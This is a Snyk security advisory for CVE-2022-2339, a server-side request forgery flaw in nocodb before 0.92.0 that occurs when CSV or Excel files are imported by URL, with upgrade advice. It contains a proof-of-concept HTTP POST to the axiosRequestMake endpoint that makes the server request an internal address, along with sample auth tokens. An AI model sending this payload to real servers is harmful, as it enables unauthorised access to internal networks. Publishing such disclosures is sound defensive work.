Server-side Request Forgery (SSRF) Affecting nocodb package, versions <0.92.0
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.15% (51st percentile)
- Snyk ID SNYK-JS-NOCODB-2944243
- published 7 Jul 2022
- disclosed 7 Jul 2022
- credit Aziz Hakim
Introduced: 7 Jul 2022
CVE-2022-2339
How to fix?
Upgrade nocodb to version 0.92.0 or higher.
Overview
nocodb is a NocoDB
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to improper validation when importing CSV or Excel files via URL. Using this option, exploitation is possible by crafting the responseType parameter.
PoC:
POST /api/v1/db/meta/axiosRequestMake HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
xc-gui: true
xc-auth: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImRldkBsb2NhbC5ob3N0IiwiZmlyc3RuYW1lIjpudWxsLCJsYXN0bmFtZSI6bnVsbCwiaWQiOiJ1c184OTJhemRkY2F5cXFvcCIsInJvbGVzIjoiIsInRva2VuX3ZlcnNpb24iOiI0MWU5ZDUwIzYWQ2NjFjZjMzNzUxMmJlZDIwZDllNzliNSIsImlhdCI6MTY1NTE4Mjc2OH0.zE-Z0xoYcmKn1Fp5inqdzmf3gfMXWvl64GbS8ahPpF4
Content-Length: 55
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/dashboard/
Cookie: refresh_token=924112616a665e0baeca68cc4c1b815d23d971f655651fe12669176cfbb28c8babcfda6
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"apiMeta":{"url":"http://10.0.0.1","responseType":""}}
References
CVSS Scores (version 3.1)